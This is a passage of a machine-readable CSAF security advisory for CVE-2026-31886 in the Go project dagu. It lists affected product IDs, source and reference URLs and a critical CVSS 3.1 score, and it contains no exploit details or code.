"CSAFPID-5731033", "CSAFPID-5731034", "CSAFPID-5731035", "CSAFPID-5731036", "CSAFPID-5731037", "CSAFPID-5731038", "CSAFPID-5731039", "CSAFPID-5731040", "CSAFPID-5731041", "CSAFPID-5731042", "CSAFPID-5731043", "CSAFPID-5731044", "CSAFPID-5731045", "CSAFPID-5731046", "CSAFPID-5731047", "CSAFPID-5731048", "CSAFPID-5731049", "CSAFPID-5731050", "CSAFPID-5731051", "CSAFPID-5731052", "CSAFPID-5731053", "CSAFPID-5910285", "CSAFPID-5910286", "CSAFPID-5910287", "CSAFPID-5910288", "CSAFPID-5910289", "CSAFPID-5910290", "CSAFPID-5910291", "CSAFPID-5910292", "CSAFPID-5910293", "CSAFPID-5910294", "CSAFPID-5910295", "CSAFPID-5910296", "CSAFPID-5910297", "CSAFPID-5910298" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-m4q3-457p-hh2x" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-m4q3-457p-hh2x" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-31886" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/31xxx/CVE-2026-31886.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31886" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-31886" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31886" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-m4q3-457p-hh2x" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-m4q3-457p-hh2x.json?alt=media" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4693.json?alt=media" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-31886.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/dagu-org/dagu/security/advisories/GHSA-m4q3-457p-hh2x" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-m4q3-457p-hh2x" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/dagu-org/dagu/commit/12c2e5395bd9331d49ca103593edfd0db39c4f38" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31886" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://pkg.go.dev/vuln/GO-2026-4693" }, { "category": "external", "summary": "Reference - osv", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/31xxx/CVE-2026-31886.json" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-5700905", "CSAFPID-5700906", "CSAFPID-5700907", "CSAFPID-5700908", "CSAFPID-5700909", "CSAFPID-5700910", "CSAFPID-5700911", "CSAFPID-5700912", "CSAFPID-5700913", "CSAFPID-5700914", "CSAFPID-5700915", "CSAFPID-5700916", "CSAFPID-5700917", "CSAFPID-5700918", "CSAFPID-5700919", "CSAFPID-5700920", "CSAFPID-5700921", "CSAFPID-5700922", "CSAFPID-5700923", "CSAFPID-5700924", "CSAFPID-5700925", "CSAFPID-5700926", "CSAFPID-5700927", "CSAFPID-5700928", "CSAFPID-5700929", "CSAFPID-5700930", "CSAFPID-5700931", "CSAFPID-5700932", "CSAFPID-5700933", "CSAFPID-5700934", "CSAFPID-5700935", "CSAFPID-5700936", "CSAFPID-5700937", "CSAFPID-5700938", "CSAFPID-5700939", "CSAFPID-5700940", "CSAFPID-5700941", "CSAFPID-5700942", "CSAFPID-5700943", "CSAFPID-5700944", "CSAFPID-5700945", "CSAFPID-5700946", "CSAFPID-5700947", "CSAFPID-5700948", "CSAFPID-5700949", "CSAFPID-5700950", "CSAFPID-5700951", "CSAFPID-5700952", "CSAFPID-5700953", "CSAFPID-5700954", "CSAFPID-5700955", "CSAFPID-5700956", "CSAFPID-5700957", "CSAFPID-5700958", "CSAFPID-5700959", "CSAFPID-5700960", "CSAFPID-5700961", "CSAFPID-5700962", "CSAFPID-5700963", "CSAFPID-5700964", "CSAFPID-5700965", "CSAFPID-5700966", "CSAFPID-5700967", "CSAFPID-5700968", "CSAFPID-5700969", "CSAFPID-5700970", "CSAFPID-5700971", "CSAFPID-5700972", "CSAFPID-5700973", "CSAFPID-5700974", "CSAFPID-5700975", "CSAFPID-5700976", "CSAFPID-5700977", "CSAFPID-5700978", "CSAFPID-5700979", "CSAFPID-5700980", "CSAFPID-5700981", "CSAFPID-5700982", "CSAFPID-5700983", "CSAFPID-5700984", "CSAFPID-5700985", "CSAFPID-5700986", "CSAFPID-5700987", "CSAFPID-5700988", "CSAFPID-5700989", "CSAFPID-5700990", "CSAFPID-5700991", "CSAFPID-5700992", "CSAFPID-5700993", "CSAFPID-5700994", "CSAFPID-5700995", "CSAFPID-5700996", "CSAFPID-5700997", "CSAFPID-5700998", "CSAFPID-5700999", "CSAFPID-5701000", "CSAFPID-5701001", "CSAFPID-5701002", "CSAFPID-5701003", "CSAFPID-5701004", "CSAFPID-5701005", "CSAFPID-5701006", "CSAFPID-5701007", "CSAFPID-5701008", "CSAFPID-5701009", "CSAFPID-5701010", "CSAFPID-5701011", "CSAFPID-5701012", "CSAFPID-5701013", "CSAFPID-5701014", "CSAFPID-5701015", "CSAFPID-5701016", "CSAFPID-5701017", "CSAFPID-5701018", "CSAFPID-5701019", "CSAFPID-5701020", "CSAFPID-5701021", "CSAFPID-5701022", "CSAFPID-5701023", "CSAFPID-5701024", "CSAFPID-5701025", "CSAFPID-5701026", "CSAFPID-5701027", "CSAFPID-5701028", "CSAFPID-5701029", "CSAFPID-5701030", "CSAFPID-5730985", "CSAFPID-5730986", "CSAFPID-5730987", "CSAFPID-5730988", "CSAFPID-5730989", "CSAFPID-5730990", "CSAFPID-5730991", "CSAFPID-5730992", "CSAFPID-5730993", "CSAFPID-5730994", "CSAFPID-5730995", "CSAFPID-5730996", "CSAFPID-5730997", "CSAFPID-5730998", "CSAFPID-5730999", "CSAFPID-5731000", "CSAFPID-5731001", "CSAFPID-5731002", "CSAFPID-5731003", "CSAFPID-5731004", "CSAFPID-5731005", "CSAFPID-5731006", "CSAFPID-5731007", "CSAFPID-5731008", "CSAFPID-5731009", "CSAFPID-5731010", "CSAFPID-5731011", "CSAFPID-5731012", "CSAFPID-5731013", "CSAFPID-5731014", "CSAFPID-5731015", "CSAFPID-5731016", "CSAFPID-5731017", "CSAFPID-5731018", "CSAFPID-5731019", "CSAFPID-5731020", "CSAFPID-5731021", "CSAFPID-5731022", "CSAFPID-5731023", "CSAFPID-5731024", "CSAFPID-5731025", "CSAFPID-5731026", "CSAFPID-5731027", "CSAFPID-5731028", "CSAFPID-5731029", "CSAFPID-5731030", "CSAFPID-5731031", "CSAFPID-5731032", "CSAFPID-5731033", "CSAFPID-5731034", "CSAFPID-5731035", "CSAFPID-5731036", "CSAFPID-5731037", "CSAFPID-5731038", "CSAFPID-5731039", "CSAFPID-5731040", "CSAFPID-5731041", "CSAFPID-5731042", "CSAFPID-5731043", "CSAFPID-5731044", "CSAFPID-5731045", "CSAFPID-5731046", "CSAFPID-5731047", "CSAFPID-5731048", "CSAFPID-5731049", "CSAFPID-5731050", "CSAFPID-5731051", "CSAFPID-5731052", "CSAFPID-5731053", "CSAFPID-5825017", "CSAFPID-5844410", "CSAFPID-5907261", "CSAFPID-5910285", "CSAFPID-5910286", "CSAFPID-5910287", "CSAFPID-5910288", "CSAFPID-5910289", "CSAFPID-5910290", "CSAFPID-5910291", "CSAFPID-5910292", "CSAFPID-5910293", "CSAFPID-5910294", "CSAFPID-5910295", "CSAFPID-5910296", "CSAFPID-5910297", "CSAFPID-5910298" ] } ], "title": "CVE-2026-31886" } ] }